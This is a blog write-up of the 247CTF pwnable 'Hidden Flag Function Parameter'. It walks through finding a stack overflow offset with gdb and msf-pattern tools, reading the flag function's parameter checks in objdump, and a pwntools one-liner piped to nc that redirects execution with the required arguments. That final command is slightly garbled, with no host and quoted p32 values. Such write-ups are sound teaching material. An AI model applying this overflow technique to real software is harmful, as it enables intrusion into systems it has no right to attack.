Hidden Flag Function Parameter (pwn)

PUBLISHED ON 22/03/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC


This is my write-up of a Pwnable challenge Hidden Flag Function Parameter on the CTF site


Can you control this applications flow to gain access to the hidden flag function with the correct parameters?


This one is very similar to Hidden Flag Function, but as we can see in the instructions, we have to also pass the right parameters to get the flag.

I found a lot of good stuff here.

kali@kali:~$ checksec hidden_flag_function_with_args
[*] '/home/kali/hidden_flag_function_with_args'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

We can see that we have 32bit little endian binary with NX enabled.

Lets create a discrete pattern:

kali@kali:~$ msf-pattern_create -l 300

Run the binary with gdb (I recommend you to install gef) and paste the pattern obtained in previous step in the input:

kali@kali:~$ gdb -q ./hidden_flag_function_with_args
GEF for linux ready, type `gef' to start, `gef config' to configure
75 commands loaded for GDB 9.1 using Python engine 3.8
[*] 5 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./hidden_flag_function_with_args...
(No debugging symbols found in ./hidden_flag_function_with_args)
gef  r
Starting program: /home/kali/hidden_flag_function_with_args
Sorry, no flag here!
You can ask for one though:

Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0x1
$ebx   : 0x41346541 ("Ae4A"?)
$ecx   : 0x0
$edx   : 0xf7fb601c    0x00000000
$esp   : 0xffffd4c0    "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"
$ebp   : 0x65413565 ("e5Ae"?)
$esi   : 0xf7fb4000    0x001d6d6c
$edi   : 0xf7fb4000    0x001d6d6c
$eip   : 0x37654136 ("6Ae7"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd4c0+0x0000: "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"	  $esp
0xffffd4c4+0x0004: "e9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5[...]"
0xffffd4c8+0x0008: "0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A[...]"
0xffffd4cc+0x000c: "Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag[...]"
0xffffd4d0+0x0010: "f3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9[...]"
0xffffd4d4+0x0014: "4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0A[...]"
0xffffd4d8+0x0018: "Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah[...]"
0xffffd4dc+0x001c: "f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x37654136
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hidden_flag_fun", stopped 0x37654136 in ?? (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

The program breaks at 0x37654136, so we use msf-pattern_offset, to calculate the offset:

kali@kali:~$ msf-pattern_offset -q 0x37654136
[*] Exact match at offset 140

Now lets check the objdump of the binary, we are searching for cmp instructions, as we know that some parameter conditions have to be met:

kali@kali:~$ objdump -drwC -Mintel -d hidden_flag_function_with_args
08048576 <flag>:
 8048576:	55                   	push   ebp
 8048577:	89 e5                	mov    ebp,esp
 8048579:	53                   	push   ebx
 804857a:	81 ec 94 00 00 00    	sub    esp,0x94
 8048580:	e8 2b ff ff ff       	call   80484b0 <__x86.get_pc_thunk.bx>
 8048585:	81 c3 7b 1a 00 00    	add    ebx,0x1a7b
 804858b:	81 7d 08 37 13 00 00 	cmp    DWORD PTR [ebp+0x8],0x1337
 8048592:	75 63                	jne    80485f7 <flag+0x81>
 8048594:	81 7d 0c 47 02 00 00 	cmp    DWORD PTR [ebp+0xc],0x247
 804859b:	75 5a                	jne    80485f7 <flag+0x81>
 804859d:	81 7d 10 78 56 34 12 	cmp    DWORD PTR [ebp+0x10],0x12345678
 80485a4:	75 51                	jne    80485f7 <flag+0x81>

So the parameter values need to be set to: 0x1337, 0x247 and 0x12345678.

kali@kali:~$ python -c "from pwn import *; print 'a' * 140 + p32("0x08048576")+'P'*4+p32("0x1337")+p32("0x247")+p32("0x12345678")" | nc 50284
Sorry, no flag here!
You can ask for one though:
How did you get here?
Have a flag!

See Also